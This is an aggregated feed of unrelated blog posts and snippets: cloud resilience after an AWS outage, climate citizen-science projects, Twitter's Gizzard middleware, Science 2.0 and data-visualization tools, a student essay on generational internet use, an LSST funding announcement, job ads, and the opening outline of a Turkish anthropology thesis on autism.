    It is interesting to see how Netflix, a poster user of Amazon cloud services, managed to survive this outage. Netflix says, “When we re-designed for the cloud this Amazon failure was exactly the sort of issue that we wanted to be resilient to. Our architecture avoids using EBS as our main data storage service, and the SimpleDB, S3 and Cassandra services that we do depend upon were not affected by the outage.” Netflix admits that their service ran without intervention, but with a higher-than-usual error rate and higher latency than normal through the morning, which is the low-traffic time of day for Netflix streaming. Among the major engineering decisions they implemented to avoid such outages are designing things as stateless applications and maintaining multiple redundant hot copies of the data spread across zones. Netflix calls their solution “Cloud Solutions for the Cloud”: the claim is that instead of fork-lifting the existing applications from their data centers to Amazon's and simply using EC2, they have fully embraced the cloud paradigm. Essentially, Netflix has automated its zone fail-over and recovery process and hosted its services in multiple regions while reducing its dependence on EBS.
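    A minimal sketch – not Netflix's actual code – of the zone-failover idea: keep redundant hot copies of the data in several zones and let reads skip any zone marked unhealthy. The zone names and data here are placeholders:

```python
import random

# Placeholder zone names and data; only the failover shape matters:
# redundant hot copies live in several zones, and reads skip unhealthy ones.
REPLICAS = {
    "zone-a": "hot-copy-a",
    "zone-b": "hot-copy-b",
    "zone-c": "hot-copy-c",
}

def read(healthy_zones):
    """Serve the request from any zone that is still healthy."""
    candidates = [z for z in REPLICAS if z in healthy_zones]
    if not candidates:
        raise RuntimeError("all replica zones are down")
    return REPLICAS[random.choice(candidates)]

# One zone fails: reads carry on from the survivors.
print(read({"zone-b", "zone-c"}))  # hot-copy-b or hot-copy-c
```

    The price of this design is keeping every copy hot and the application stateless, which is exactly the cost/complexity trade-off discussed above.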

    Clearly there are ways to get the best of the cloud – except that some of them come with different economics and call for a greater ability to engineer and manage operations. Amazon may have to increase its level of transparency about its design, and its operational metrics need to cover many more areas of operation than the narrow set users get to see now. To sum up, I would hesitate to call the AWS outage a failure of the cloud, but the journey into the cloud calls for more preparation and better-thought-out design on the user's side.

              Citizen Science: Climatology for Everyone   

    With recent posts addressing personal action in the fight against global warming, I thought it would be interesting to dedicate a post to ways in which the average citizen can help by directly contributing to our scientific understanding of it. That is, becoming a ‘citizen scientist’.

    Citizen science projects date back hundreds of years, with many of the first projects involving citizens keeping track of wildlife populations. The Audubon Christmas Bird Count is perhaps the most famous in the United States and dates back to 1900. With help from the internet, and a growing recognition of the value that citizens are capable of contributing, citizen science projects have been rapidly growing.

    The range of subjects that are covered by citizen science projects is vast. Here are just a few of them, which directly relate to climate change:
    Computational projects
    The majority of activities that we use our computers for actually require less than 1% of our computer’s available processing power. Using one of today's new computers to browse the internet is like using a forklift to hang a potted plant. Why not get the most out of that expensive hardware under the hood, by putting it to work to help the planet?

    Climateprediction.net – Built on the popular BOINC grid computing software, it allows you to harness unused processing power to run global climate models on your home computer. Several scientific papers have already been published based on results from the project.

    The Clean Energy Project – Part of IBM’s World Community Grid, and also running on the BOINC platform, it uses the powerful Q-Chem® quantum chemistry software to explore new molecular structures for use in potential low-cost “organic” solar panels.

    Hydrogen@home – A new project, similar to the Clean Energy Project, but seeks new ways to create and store hydrogen as part of a clean fuel economy.

    The projects listed above may be considered 'passive' citizen science, in that they don't require any real effort to carry out. Once you download and get the software running to your preferences, you can essentially ‘set it and forget it’. The software is fully customizable with respect to how much of your processor/memory you want to allocate to the projects, when the computations run, and which projects you would like to contribute to (if climate science isn't your greatest passion, there are several other projects out there ranging from the search for aliens to discovering new protein folding techniques.)

    Active Participation
    For those who are motivated to do a bit more, there are many 'active' participation projects out there. Some of these can be quite involved, but typically don't require any minimum time commitment--work as often as you like and as hard as you like.
    Old Weather – Read old navy logbooks and digitize their historic weather information, in order to gain a better understanding of past weather and climate patterns and enhance the accuracy of modern day predictions. A talent for reading handwriting is required.

    Data rescue at home – Similar to Old Weather but with a wider range of sources, involves digitizing handwritten atmospheric conditions for computational analysis. Currently working on German radiosonde data from WWII.
    CoCoRaHS (USA) – Measuring precipitation in “your backyard”, with the goal of creating an ongoing, ultra-high resolution data set of precipitation events, which will contribute to scientific understanding of weather and climate patterns.

    Opal Climate Survey (England) – Requests that citizens observe and report several climate factors, such as aircraft contrails and wind speed. Related surveys such as air quality and biodiversity are also featured.
    Students’ Cloud Observations On-Line – A NASA program, geared towards kids but with the very important purpose of cross-checking satellite cloud measurements. Students visually classify clouds by altitude, type, cover percentage, and opacity.
    Surfacestations.org (USA) – Seeks volunteers to photographically document the status of official temperature stations throughout the United States.
    ClimateWatch (Australia) – Track populations of an insect, animal or plant species through time within a certain region, to better understand how the biosphere reacts to climate change and other long term trends.
    ClimateWatch is similar in nature to the earliest type of citizen science project discussed above, that of keeping track of species numbers and behavior in their natural environment (formally known as phenology). While most such projects do not officially take tracking climate change to be their primary goal, there is no doubt that this data will be helpful in tracking how the biosphere is reacting to regional or global climate forcings. Knowing how the natural world will react to a rapid climate shift is among the biggest and most important uncertainties still plaguing climate predictions, and lack of data is a limiting factor. Imagine how much more informed our policy actions could be if we knew exactly how the populations and behaviors of all of the key species on earth were trending.

    There are hundreds of similar projects involving tracking the natural world; it is almost certain you will be able to find one involving whichever plant, animal, or insect species you may especially hold dear. Many of these projects can be found at the excellent database for citizen science projects, scienceforcitizens.net. There are even iPhone apps to let you participate on the go.

    So why not start giving scientists a hand? Virtually anyone, including kids, can get involved in these projects and know they are making a real difference. Many feature some kind of participation-based points system for fun and to encourage some friendly competition. And they can also be a great way to meet people—whether your passion lies in developing clean energy to save the world, or simply the intricacies of the swallowtail’s mating cycle, there is no shortage of passionate citizens out there working hard to improve our scientific understanding of the natural world.

    Green Internet Consultant. Practical solutions to reducing GHG emissions such as free broadband and electric highways. http://green-broadband.blogspot.com/
    email: Bill.St.Arnaud@gmail.com
    twitter: BillStArnaud
    blog: http://billstarnaud.blogspot.com/
    skype: Pocketpro
              Cool new Middleware from Twitter for distributed data   

    "Twitter last night offered up the code for Gizzard, an open-source framework for accessing distributed data quickly, which Twitter built to help the site deal with the millions of requests it gets from users needing access to their friends and their own tweets. It could become an important component of building out web-based businesses, much like Facebook’s Cassandra project has swept through the ranks of webscale startups and even big companies.
    Gizzard is a middleware networking service that sits between the front-end web site client and the database and attempts to divide and replicate data in storage in intelligent ways that allow it to be accessed quickly by the site. Gizzard’s function is to take the requests coming in through the fire hose and allocate the stream of requests across multiple databases without slowing things down. It’s also fault-tolerant, which means if one section of data is compromised, the service will try to route to other sections. From the Twitter blog post:"
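    A rough sketch of what sharding middleware of this kind does (the shard table and host names below are invented for illustration; Gizzard itself is a Scala service and far more sophisticated): hash the key to a partition, then walk that partition's replica list so one dead host doesn't fail the request:

```python
import hashlib

# Invented shard table: each partition has a primary and a replica host.
SHARDS = {
    0: ["db0-primary", "db0-replica"],
    1: ["db1-primary", "db1-replica"],
}

def route(key, down=frozenset()):
    """Pick a live database host for this key's partition."""
    shard = int(hashlib.md5(key.encode()).hexdigest(), 16) % len(SHARDS)
    for host in SHARDS[shard]:        # primary first, replicas after
        if host not in down:
            return host
    raise RuntimeError("no live replica for shard %d" % shard)

primary = route("user:alice")               # that key's primary host
fallback = route("user:alice", down={primary})  # same shard, its replica
```

    The fault tolerance described in the quote falls out of the replica walk: marking a host as down simply shifts traffic for its shard to the surviving copies.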
              Citizen Science - how you can make a contribution to study of climate change   
    [From Climate Progress - “the indispensable blog” — Tom Friedman, New York Times –BSA]


    Online social networking is no longer just about tagging a picture of your dog on Facebook or announcing to the world what you’re having for dinner on Twitter. Scientific institutions worldwide are beginning to harness the power of online social networking for scientific research. Online communities are an ideal vehicle for matching professional scientists with armies of enthusiastic amateurs. This corps of citizen scientists has the capacity to capture far more data over a vastly expanded geographical spectrum than professional scientists can on their own.
    The USA National Phenology Network is one organization that is reaching out to citizen scientists via the Internet. People have used phenology, the study of the timing of lifecycle events of plants and animals, to detect the signs of spring since the early 18th century. The rising threat posed by global warming has spurred scientists to put phenology to another use: to detect the signs of climate change.
    Plants and animals are very sensitive to even the smallest changes in their climates. Shifts in the timing of their lifecycle events can therefore be an important indicator in the study of climate change and its effects. Slight changes can have huge repercussions; mutual relationships between species and even entire systems can begin to fall apart.
    USA-NPN is asking people across the country to record the phenology of their local flora and then report it online. Amateur hikers and photographers can also participate in NPN’s Project Budburst. They are asked to identify the phenological stage of the flowers and plants they see using information provided by the project’s website. The participants record the location, longitude, and latitude of what they observe. Eventually, Project Budburst will use this information to include real-time mapping with Google maps.
    Relying on anonymous volunteers to collect data that will be entered into important scientific databases certainly raises questions about the reliability of the information gathered. Yet it turns out that most of the data is remarkably accurate, and researchers do perform checks on anomalous data. What’s more, the large pool of samples collected by a large group of volunteers diminishes the impact of any faulty data.
    This creative new use for social networking also answers critics’ accusations about the frivolity of Facebook, Twitter, and other sites with proof that online networking has the potential to mobilize users to actively participate in innovative programs. Jack Weltzin, executive director of NPN, has said that in the future NPN hopes to make it possible for people to submit their findings via Twitter. NPN, a nonprofit organization, also hopes that iPhone and Facebook applications might be created to more easily facilitate volunteer participation.
    Climate change scientists are not the only members of the scientific profession to tap into the potential of these online communities. In addition to tracking climate change, the information participants collect can help scientists predict wildfires and pollen production and monitor droughts as well as detect and control invasive species. Other online projects, such as “The Great World Wide Star Count,” rely on volunteer participation to gauge the level of light pollution across the globe. Several websites are also dedicated to tracking the migratory and breeding patterns of animals such as birds, frogs, and butterflies. All of these observations will augment the databases available to scientists attempting to understand annual fluctuations.
              Science 2.0: New online tools may revolutionize research   
    [Excellent article on how Web 2.0 tools are transforming science. The 2 projects mentioned have been funded by CANARIE in the latest NEP program amongst a total of 11 similar projects . For more examples of how web 2.0 is revolutionizing science please see my Citizen Science Blog. Thanks to Richard Ackerman for some of the FriendFeed pointers. Some excerpts from CBC website– BSA]


    Citizen Science

    CANARIE NEP program

    Described as an extension of the internet under the ocean, the Venus Coastal Observatory off Canada's west coast provides oceanographers with a continuous stream of undersea data once accessible only through costly marine expeditions. When its sister facility Neptune Canada launches next summer, the observatories' eight nodes will provide ocean scientists with an unprecedented wealth of information.
    Sifting through all that data, however, can be quite a task. So the observatories, with the help of CANARIE Inc., operator of Canada's advanced research network, are developing a set of tools they call Oceans 2.0 to simplify access to the data and help researchers work with it in new ways. Some of their ideas look a lot like such popular consumer websites as Facebook, Flickr, Wikipedia and Digg.
    And they're not alone. This set of online interaction technologies called Web 2.0 is finding its way into the scientific community.
    Michael Nielsen, a Waterloo, Ont., physicist who is working on a book on the future of science, says online tools could change science to an extent that hasn't happened since the late 17th century, when scientists started publishing their research in scientific journals.
    One way to manage the data boom will involve tagging data, much as users of websites like Flickr tag images or readers of blogs and web pages can "Digg" articles they approve. On Oceans 2.0, researchers might attach tags to images or video streams from undersea cameras, identifying sightings of little-known organisms or examples of rare phenomena.
    The Canadian Space Science Data Portal (CSSDP), based at the University of Alberta, is also working on online collaboration tools. Robert Rankin, a University of Alberta physics professor and CSSDP principal investigator, foresees scientists attaching tags to specific data items containing occurrences of a particular process or phenomenon in which researchers are interested.
    "You've essentially got a database that has been developed using this tagging process," he says.
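Rankin's tagging idea reduces to a small inverted index from tags to data items, so that anyone can later pull up every item carrying a given tag. A minimal sketch of that structure (all names here are hypothetical, not taken from Oceans 2.0 or the CSSDP):

```python
from collections import defaultdict

class TaggedArchive:
    """Minimal sketch of a tag-searchable data archive: researchers
    attach free-form tags to data items, and the archive keeps an
    inverted index so a later query can retrieve every item tagged
    with a particular phenomenon."""

    def __init__(self):
        self._index = defaultdict(set)  # tag -> set of item ids

    def tag(self, item_id, tag):
        """Attach a tag to a data item (e.g. a video frame or reading)."""
        self._index[tag].add(item_id)

    def find(self, tag):
        """Return all item ids carrying the tag, in a stable order."""
        return sorted(self._index.get(tag, set()))
```

Layering a tag index on top of the raw data store, rather than rewriting the data itself, is what lets the "database developed using this tagging process" grow organically as researchers annotate.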
    If data tagging is analogous to Flickr or Digg, other initiatives look a bit like Facebook.
    Pirenne envisions Oceans 2.0 including a Facebook-like social networking site where researchers could create profiles showing what sort of work they do and what expertise they have. When a scientist is working on a project and needs specific expertise — experience in data mining and statistical analysis of oceanographic data, for example — he or she could turn to this facility to find likely collaborators.
    "It's a really exciting time," Lok says, "a really active time for Science 2.0."

    It got lots of buzz on FriendFeed; there are multiple mentions of it.



    (The conference Eva's referring to is Science Online 2009.)






              Many eyes   
    From the New York Times:

    Lines and Bubbles and Bars, Oh My! New Ways to Sift Data By Anne Eisenberg

    PEOPLE share their videos on YouTube and their photos at Flickr. Now they can share more technical types of displays: graphs, charts and other visuals they create to help them analyze data buried in spreadsheets, tables or text.

    At an experimental Web site, Many Eyes (www.many-eyes.com), users can upload the data they want to visualize, then try sophisticated tools to generate interactive displays. These might range from maps of relationships in the New Testament to a display of the comparative frequency of words used in speeches by Senators Hillary Rodham Clinton and Barack Obama.

    The site was created by scientists at the Watson Research Center of I.B.M. in Cambridge, Mass., to help people publish and discuss graphics in a group. Those who register at the site can comment on one another's work, perhaps visualizing the same information with different tools and discovering unexpected patterns in the data.

    Collaboration like this can be an effective way to spur insight, said Pat Hanrahan, a professor of computer science at Stanford whose research includes scientific visualization. "When analyzing information, no single person knows it all," he said. "When you have a group look at data, you protect against bias. You get more perspectives, and this can lead to more reliable decisions."

    The site is the brainchild of Martin Wattenberg and Fernanda B. Viégas, two I.B.M. researchers at the Cambridge lab. Dr. Wattenberg, a computer scientist and mathematician, says sophisticated visualization tools have historically been the province of professionals in academia, business and government. "We want to bring visualization to a whole new audience," he said — to people who have had relatively few ways to create and discuss such use of data.

    "The conversation about the data is as important as the flow of data from the database," he said.

    The Many Eyes site, begun in January 2007, offers 16 ways to present data, from stack graphs and bar charts to diagrams that let people map relationships. TreeMaps, showing information in colorful rectangles, are among the popular tools.

    Initially, the site offered only analytical tools like graphs for visualizing numerical data. "The interesting thing we noticed was that users kept trying to upload blog posts, and entire books," Dr. Viégas said, so the site added techniques for unstructured text. One tool, called an interleaved tag cloud, lets users compare side by side the relative frequencies of the words in two passages — for instance, President Bush's State of the Union addresses in 2002 and 2003.
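The interleaved tag cloud described above boils down to computing the relative frequency of each word in two passages and pairing the results for side-by-side display. A rough sketch of that underlying computation (my own illustration, not Many Eyes' actual code):

```python
from collections import Counter
import re

def word_freqs(text):
    """Relative frequency of each word in a passage."""
    words = re.findall(r"[a-z']+", text.lower())
    total = len(words)
    return {w: c / total for w, c in Counter(words).items()}

def interleaved_cloud(text_a, text_b):
    """For every word in either passage, pair its relative frequency
    in passage A with its relative frequency in passage B -- the data
    behind a side-by-side (interleaved) tag cloud."""
    fa, fb = word_freqs(text_a), word_freqs(text_b)
    return {w: (fa.get(w, 0.0), fb.get(w, 0.0))
            for w in sorted(set(fa) | set(fb))}
```

Rendering then maps each frequency pair to two font sizes, one per passage, so shifts in emphasis between, say, two State of the Union addresses become visible at a glance.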

    Almost all the tools are interactive, allowing users to change parameters, zoom in or out or show more information when the mouse moves over an image, Dr. Wattenberg said.

    Users can embed images and links to their visualizations in their Web sites or blogs, just as they can embed YouTube videos. "It's great that people can paste in a YouTube video of cats" on their blogs, Dr. Viégas said. "So why not a visual that gives you some insight into the sea of data that surrounds us? I might find one thing; someone else, something completely different, and that's where the conversation starts."

    Rich Hoeg, a technology manager who lives in New Hope, Minn., and has a blog at econtent.typepad.com, was so taken with the possibilities for group collaboration that he wrote a tutorial on using Many Eyes as part of his series called "NorthStar Nerd Tutorials."

    [snip]
              Comm 385: Generation GAP (week 7)   

    Not the jeans.

    Seriously, this will have nothing to do with GAP jeans, and the propensity of teen girls to cry desperately to their mothers to buy them this particular brand of clothing. Maybe I am out of touch, however, since my last image of this was 19 years ago, while I watched my two sisters nearly pass out in hysterics over this issue. Maybe now it's Abercrombie & Fitch. Maybe Old Navy. I just don't know.

    But I am going to be talking (writing) about a 'gap' (notice the lowercase, and lack of any trademark). Why is it important that I make this distinction? I mean, 'gap' has always been defined as a break or hole in an object or between two objects. The word has not always been associated with a midrange clothing store. But today I am discussing an interview with three different friends of mine... and the word 'gap' is going to be very important.

    The intent was to interview three age groups. Without getting into specifics: young, middle-aged and old. Why no specifics? Because there is a difference in mindset which does not necessarily translate based on age alone. It would have been trivial to find someone in each given age group who thought about and used the internet (our topic du jour) in ways purportedly of another age: good friends slightly older, hitting that middle group, who are fascinated with each piece and parcel of online connectivity; young people too distracted by hormones to care what a blinking box does... no, I separate not by actual age, but by general age group. Someone who identifies as middle-aged, someone who thinks (and is) far too young for their own good, and someone who considers youth a thing long past. That, and besides the youngest interviewee, nobody wanted their age mentioned. Natch (slang for 'naturally' - I picked it up from, of all things, Frosty the Snowman as read by Jimmy Durante).

    The youngest of the trio is a late-teenish friend from OSU. To her, the internet is her lifeline. Far from home, the internet is her communication tool for maintaining relationships across the country. Daily she chats with her mother over Skype, teases her boyfriend over IM, and updates her friends via MySpace. Like a "personal assistant", her computer serves her every need - from classwork to shopping, from friends to entertainment; her trusted Dell works through it all. It is on at all hours, and is her most frequent companion when running around town or between classes. "If I don't have my laptop, it's like my world is much smaller." She is also not sure she would have come all the way out to Oregon if it weren't for the internet - she only applied to OSU after finding it online.

    The internet is greeted without the same enthusiasm by my 'middle-aged' friend, who found being labelled middle-aged far more disturbing than the potential loss of internet access. "It's a tool... plain and simple. I use it alot (sic), but don't trust it necessarily." Much more embattled, he indicates that the internet is very easy and straightforward to use, but that he just doesn't see the need to use it for everything. "A phone call is better," he explains (which doesn't explain why I had to email him these questions). He indicated he shopped a lot, used email heavily but rarely chatted online, and didn't bother with social connectivity sites. When asked about his level of comfort using the internet, he wrote back a fairly long diatribe about user interface design and people making things unnecessarily complicated. He then lambasted me a bit (in good fun) for not specifying which application, since the internet is a global connected computer infrastructure, and not a specific tool one would use. He never actually answered, but based on his technical skills, I would say he is pretty comfortable.

    Lastly, I asked an old-timer here at work. Forced to use the internet by the demands of modern educational infrastructure, he wasted no time at all complaining about the lack of personal connection, the inefficiency of email and the idiocy of thinking that everything one sent out on the internet would always arrive. He told tales of people who would call, asking 'Did you get my email?' about a message sent just a few minutes ago. He also complained loudly about the requirement to do so many things online nowadays, lamenting that taxes used to be so much simpler to file. "What in the heck has happened to stamps!" he quipped at me several times. Now, to be fair, I chose him to interview because I know how much he dislikes the "damned paperweight on my desk". So, much of this I expected. But I think he is a fair example of someone who had done a job for 35 years before having the paradigm of operation change on him virtually overnight. Only one door down can be found the next generation of scientific researcher - office cluttered with multitudes of powerful computers. The aged researcher complains of the noise and heat generated, and heads down to get more coffee, his email unread in the background. I sit around for a bit before I realize that he isn't coming back all that quickly, and leave - noticing that he has gotten into a debate about space usage with the Director out here, and that he has no intention of trying to send a map of his lab space via email. He retires in a few months, so I think my boss is fighting a losing battle.

    Three age groups. I can't help but think of those who had horses at the early part of the 20th century. Doomed by the advent of the modern automobile, their children would consider horses but a farm tool... to their grandchildren, a pet... while to the last horsemen it was their essential means of travel and a trusted companion. So too has the internet changed our society. Age has little to do with the barrier of connectivity, but it could be said that the propensity to learn new things versus the comfort of tradition influences participation online as much as anything else. My father sends me photos, but can't seem to write more than a word or two via email. My mother, younger, manages a bit more, but it falls to my sisters to actually communicate online with me from time to time. I imagine my daughter will grow up in a world where snail mail is becoming a distant memory, where email is the tool of the 'older' generation, and direct video conferencing via Skype or its replacement is the common paradigm. She will never understand the hesitance of phone calls due to long distance charges, and will never not be exposed to up-to-the-minute video recordings of major news events catalogued in massive searchable databases. Even TV, long a staple of defined dates and times, is now falling - swept aside by on-demand video and time-shifting recording devices. I realize only now, she will never have seen a dial knob on a TV. Weird.

    I make my living supporting technology. I live and die with online innovation - Apple saves me months of frustration, Vista loses me those same months. In my lifespan, I have seen the emergence of the home computer market. I was born near the same time as Apple and Microsoft... with them I have clothed myself, fed myself and bought many a pastel fruit drink guys are supposed to be embarrassed to buy. I see the generational gap (finally, I use the word again) defined so clearly from age to age. Each individual defining their age differently, yet each individual fitting so neatly into a usage category - each defined by not only how, but why we are online. The 'net pervades our lives now. From taxes, to shopping, to dating, to relationships and connections. The flow of data from one point to another finds a path of least resistance among us all. For some, this age will nearly pass us by... for others, we are drowned in the electronic noise. Is it fair to say one group stereotypically defines usage?  ...No, but we can point to trends. Younger people have grown up with these tools being the only known way of communicating, so for them it is essential. The older generation have been shown another way, yet move to the point of most effectiveness individually. 

    Lastly, some of them just think it's too damned annoying and want us to get the internet the hell off their lawn. Yes... yes... yes... sorry, it was just a wifi hotspot. :-)

              Jr. Database Administrator   
    IL-Deerfield, Job Role/Requirements: Provide first level Support and maintain SAP ASE and MS SQL Server database environment. Build database structures based on detailed design. Performs database testing to ensure performance is met and compare with expected results. Provides support during the system implementation and production. Identifies gaps in scripts and procedures. Develop and implement best practice p
              Dune Redux   

    Today on the 5: There is a new revision of a popular fanedit of the David Lynch film Dune. This new edit, Dune The Alternative Edition Redux, was recently released. Having watched it, I think it now stands as the definitive version of one of my favorite films.

              LSST Receives $30 Million   
    Via Interactions.Org

    LSST Receives $30 Million from Charles Simonyi and Bill Gates

    The Large Synoptic Survey Telescope (LSST) Project is pleased to announce receipt of two major gifts: $20M from the Charles Simonyi Fund for Arts and Sciences and $10M from Microsoft founder Bill Gates.

    Under development since 2000, the LSST is a public-private partnership. This gift enables the construction of LSST's three large mirrors; these mirrors take over five years to manufacture. The first stages of production for the two largest mirrors are now beginning at the Mirror Laboratory at the University of Arizona in Tucson, Arizona. Other key elements of the LSST system will also be aided by this commitment.

    The LSST exemplifies characteristics Simonyi and Gates have exhibited in their successful lives and careers – innovation, excitement of discovery, cutting edge technology, and a creative energy that pushes the possibilities of human achievement. The LSST leverages advances in large telescope design, imaging detectors, and computing to engage everyone in a journey of cosmic discovery.

    Proposed for "first light" in 2014, the 8.4-meter LSST will survey the entire visible sky deeply in multiple colors every week with its three-billion pixel digital camera, probing the mysteries of Dark Matter and Dark Energy, and opening a movie-like window on objects that change or move.

    "This support from Charles Simonyi and Bill Gates will lead to a transformation in the way we study the Universe," said University of California, Davis, Professor and LSST Director J. Anthony Tyson. "By mapping the visible sky deeply and rapidly, the LSST will let everyone experience a novel view of our Universe and permit exciting new questions in a variety of areas of astronomy and fundamental physics."

    The LSST will be constructed on Cerro Pachón, a mountain in northern Chile. Its design of three large mirrors and three refractive lenses in a camera leads to a 10 square degree field-of-view with excellent image quality. The telescope's 3200 Megapixel camera will be the largest digital camera ever constructed. Over ten years of operations, about 2000 deep exposures will be acquired for every part of the sky over 20,000 square degrees. This color "movie" of the Universe will open an entirely new window: the time domain. LSST will produce 30 Terabytes of data per night, yielding a total database of 150 Petabytes. Dedicated data facilities will process the data in real time.
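The quoted volumes are easy to sanity-check: 30 TB a night over ten years of nightly observing lands in the neighborhood of the 150 PB total, with the remainder presumably coming from processed products and catalogs (that split is my assumption, not stated in the release):

```python
# Back-of-envelope check of the LSST data volumes quoted above.
TB_PER_NIGHT = 30       # "30 Terabytes of data per night"
NIGHTS_PER_YEAR = 365   # assuming observing every night
YEARS = 10              # "Over ten years of operations"

raw_pb = TB_PER_NIGHT * NIGHTS_PER_YEAR * YEARS / 1000.0  # TB -> PB
print(raw_pb)  # 109.5 PB of raw nightly data; the quoted 150 PB
               # total database would also include processed images,
               # catalogs and metadata
```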

    "What a shock it was when Galileo saw in his telescope the phases of Venus, or the moons of Jupiter, the first hints of a dynamic universe," Simonyi said. "Today, by building a special telescope-computer complex, we can study this dynamism in unprecedented detail. LSST will produce a database suitable for answering a wide range of pressing questions: What is dark energy? What is dark matter? How did the Milky Way form? What are the properties of small bodies in the solar system? Are there potentially hazardous asteroids that may impact the earth causing significant damage? What sort of new phenomena have yet to be discovered?"

    "LSST is just as imaginative in its technology and approach as it is with its science mission. LSST is truly an internet telescope, which will put terabytes of data each night into the hands of anyone who wants to explore it. Astronomical research with LSST becomes a software issue - writing code and database queries to mine the night sky and recover its secrets. The 8.4 meter LSST telescope and the three gigapixel camera are thus a shared resource for all humanity - the ultimate network peripheral device to explore the universe," Gates said. "It is fun for Charles and me to be a team again supporting this work given all we have done together on software projects."

    "The LSST will be the world's most powerful survey telescope. This major gift keeps the project on schedule by enabling the early fabrication of LSST’s large optics and other long-lead components of the LSST system," said Donald Sweeney, LSST Project Manager.

    LSST is designed to be a public facility - the database and resulting catalogs will be made available to the community at large with no proprietary restrictions. A sophisticated data management system will provide easy access, enabling simple queries from individual users (both professionals and amateurs), as well as computationally intensive scientific investigations that utilize the entire database. The public will actively share the adventure of discovery of our dynamic Universe.

    More information about the LSST including current images, graphics, and
    animation can be found at http://www.lsst.org

    In 2003, the LSST Corporation was formed as a non-profit 501(c)3 Arizona corporation with headquarters in Tucson, AZ. Membership has since expanded to twenty-two members including Brookhaven National Laboratory, California Institute of Technology, Columbia University, Google Inc., Harvard-Smithsonian Center for Astrophysics, Johns Hopkins University, Kavli Institute for Particle Astrophysics and Cosmology - Stanford University, Las Cumbres Observatory Global Telescope Network, Inc., Lawrence Livermore National Laboratory, National Optical Astronomy Observatory, Princeton University, Purdue University, Research Corporation, Stanford Linear Accelerator Center, The Pennsylvania State University, The University of Arizona, University of California, Davis, University of California at Irvine, University of Illinois at Urbana-Champaign, University of Pennsylvania, University of Pittsburgh, and the University of Washington.

              Army Reveals Afghan Biometric ID Plan; Millions Scanned, Carded by May    
    President Hamid Karzai has yet to sign on. But the “Afghan Ministry of Communications and Information Technology has already secured a $122 million contract for the database development and printing of cards in support of that plan,” Osbourne adds.
              By: GregJ   
    Seems that the main issue with "YaST" is actually with "yast sw_single" and its reading of cached package info. Since RAM is dirt cheap these days and my /var/lib/zypp directory is only 93M, the simplest solution is to daemonize zypper and replace it with a command-passing script. With a "quit" command to unlock the RPM database, this might take a few hours to implement. Add to this a nightly cron job to run "zypper ref" and an /etc/zypp/zypp.conf with repo.refresh.delay = 1440 # 60 * 24 min. Of course, this ignores zypper's key handling, and a way to force a refresh...
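The commenter's nightly-refresh setup could look something like the following sketch (the cron script path and the non-interactive flag are my guesses; the repo.refresh.delay value comes from the comment itself):

```shell
# /etc/cron.daily/zypper-refresh -- hypothetical nightly job:
# refresh repository metadata overnight so interactive tools
# always find a warm, current cache and never block on a refresh
zypper --non-interactive refresh

# Paired with this in /etc/zypp/zypp.conf, cached metadata is
# treated as fresh for a full day (value is in minutes):
#   repo.refresh.delay = 1440   # 60 * 24
```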
              Senior Java Engineer - Talener - Los Angeles, CA   
    Required Skills: 6+ years of Java experience; JMS/queuing/messaging experience – Artemis preferred (open to ActiveMQ, RabbitMQ & KafkaMQ); relational databases...
    From Dice - Wed, 07 Jun 2017 14:20:20 GMT - View all Los Angeles, CA jobs

    Thesis Advisor:
    Prof. Dr. Akile Gürsoy
    Submitted to the Institute of Social Sciences for the Master's Degree in the Department of Anthropology.
    Istanbul, 2007
    LIST OF ABBREVIATIONS
    LIST OF TABLES
    LIST OF FIGURES
    LIST OF IMAGES
    LIST OF PHOTOGRAPHS
    1. INTRODUCTION
    1.1. Autism
    1.1.1. Definition of Autism
    1.1.2. History
    1.1.3. Types / Classification
    1.1.4. Prevalence
    1.1.5. Causes
    1.1.6. Diagnosis
    1.1.7. Treatment
    1.1.8. Education
    1.2. Autism in Turkey
    1.2.1. History
    1.2.2. Related Institutions and Organizations
    1.2.3. Related Legal Regulations
    1.3. Autism and Society
    1.3.1. Family
        Family–Educator Relationship
        Socio-Economic Characteristics
    1.3.2. Social Environment
    1.3.3. Media
    1.3.4. "Marginality", "Abnormality" and Autism in Turkish Society
        "Marginality" and "Abnormality"
        Autism in Turkish Society in Light of the Concepts of "Marginality" and "Abnormality"
    1.4. Focus of the Research
    1.5. Aim of the Research
    1.6. Significance of the Research
    2. RESEARCH METHOD
    2.1. The Sample and Selection of the Case to Be Studied
    2.2. Methods and Techniques Used in the Research
    2.3. Ethical Dimension of the Research
    2.3.1. Ethical Rules in Anthropology
    2.3.2. Ethical Concerns Encountered in the Research
    2.3.3. Personal Disclosure Statement
    2.4. Research Calendar and Timing
    3. FINDINGS
    3.1. Case Study: Zarif
    3.2. Zarif's Family Structure
    3.3. Zarif's Social Environment
    3.4. Zarif's Medical Condition
    3.5. Zarif's Education
    3.6. Zarif's Communication Skills
    3.7. Zarif's Individual Life Skills
    3.8. Zarif's Social Life Skills
    4. CONCLUSION AND RECOMMENDATIONS
    5. REFERENCES
    6. INDEX
    7. APPENDICES
    7.1. Related Forms
    7.1.1. Pre-Referral Information Form for Students Referred by the Guidance and Research Center for Individual Assessment
    7.1.2. Pre-Referral Information Form for Psychological Support, Sent to the RAM Guidance and Psychological Counseling Services Department
    7.1.3. Information Form for Students Placed in Mainstreaming (Inclusive) Education
    7.2. Tables
    7.3. Images
    7.4. Photographs
    7.5. Related Coverage in the Press
    7.5.1. Foreign Press
    7.5.2. Turkish Press
    7.6. Research Budget
    7.7. Sample Interview
    7.8. Sample Participant Observation
    7.9. Curriculum Vitae
    AAA : American Anthropological Association
    ABD : Amerika Birleşik Devletleri (United States of America)
    ARI : Autism Research Institute
    ASA : The Autism Society of America
    AURA : Otistikler Derneği (Autistics Association, Turkey)
    CAN : Cure Autism Now Foundation
    CDC : Centre for